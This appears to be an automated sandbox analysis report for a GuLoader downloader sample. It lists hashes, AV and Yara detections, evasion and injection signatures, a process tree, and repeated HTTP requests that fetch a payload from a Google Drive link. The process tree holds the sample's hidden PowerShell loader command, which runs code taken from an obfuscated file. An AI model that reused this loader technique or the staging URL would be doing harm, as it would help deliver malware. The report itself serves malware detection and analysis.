Edit tour

Windows Analysis Report
7uY105UTJU.exe

Overview

General Information

Sample name:	7uY105UTJU.exe renamed because original name is a hash value
Original sample name:	259018c94d2704ea14bd29e2555a2ab62c278160c81ac824a372a7966565d5a2.exe
Analysis ID:	1588757
MD5:	81ee208a058efebddabd4f78fff047d0
SHA1:	b5855bdfbb89a50bec871ee72d675063f9b49183
SHA256:	259018c94d2704ea14bd29e2555a2ab62c278160c81ac824a372a7966565d5a2
Tags:	exeuser-adrian__luca
Infos:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Early bird code injection technique detected

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected GuLoader

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Powershell drops PE file

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Writes to foreign memory regions

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

7uY105UTJU.exe (PID: 2496 cmdline: "C:\Users\user\Desktop\7uY105UTJU.exe" MD5: 81EE208A058EFEBDDABD4F78FFF047D0)

powershell.exe (PID: 5024 cmdline: powershell.exe -windowstyle hidden "$johannine=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Successively.Ton';$Elitism=$johannine.SubString(69953,3);.$Elitism($johannine) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

syrians.exe (PID: 364 cmdline: "C:\Users\user\AppData\Local\Temp\syrians.exe" MD5: 81EE208A058EFEBDDABD4F78FFF047D0)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.3373713233.000000000400B000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Signatures

System Summary

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$johannine=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Successively.Ton';$Elitism=$johannine.SubString(69953,3);.$Elitism($johannine) ", CommandLine: powershell.exe -windowstyle hidden "$johannine=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Successively.Ton';$Elitism=$johannine.SubString(69953,3);.$Elitism($johannine) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\7uY105UTJU.exe", ParentImage: C:\Users\user\Desktop\7uY105UTJU.exe, ParentProcessId: 2496, ParentProcessName: 7uY105UTJU.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$johannine=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Successively.Ton';$Elitism=$johannine.SubString(69953,3);.$Elitism($johannine) ", ProcessId: 5024, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T05:09:50.993196+0100	2803270	2	Potentially Bad Traffic	192.168.2.6	54044	142.250.186.174	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\syrians.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\syrians.exe	Virustotal: Detection: 60%			Perma Link

Multi AV Scanner detection for submitted file

Source: 7uY105UTJU.exe	ReversingLabs: Detection: 50%
Source: 7uY105UTJU.exe	Virustotal: Detection: 60%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: 7uY105UTJU.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.6:54044 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.6:54045 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.6:54046 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.6:54050 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.6:54054 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.6:54056 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.6:54061 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.6:54065 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.6:54067 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.6:54069 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.6:54073 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.6:54075 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.6:54081 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.6:54083 version: TLS 1.2

Source: 7uY105UTJU.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: syrians.exe, 00000008.00000001.2843443692.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: mshtml.pdbUGP source: syrians.exe, 00000008.00000001.2843443692.0000000000649000.00000020.00000001.01000000.00000007.sdmp

Source: C:\Users\user\Desktop\7uY105UTJU.exe	Code function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C63
Source: C:\Users\user\Desktop\7uY105UTJU.exe	Code function: 0_2_004068B4 FindFirstFileW,FindClose,	0_2_004068B4
Source: C:\Users\user\Desktop\7uY105UTJU.exe	Code function: 0_2_00402910 FindFirstFileW,	0_2_00402910

Source: global traffic

TCP traffic: 192.168.2.6:53910 -> 162.159.36.2:53

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:54044 -> 142.250.186.174:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
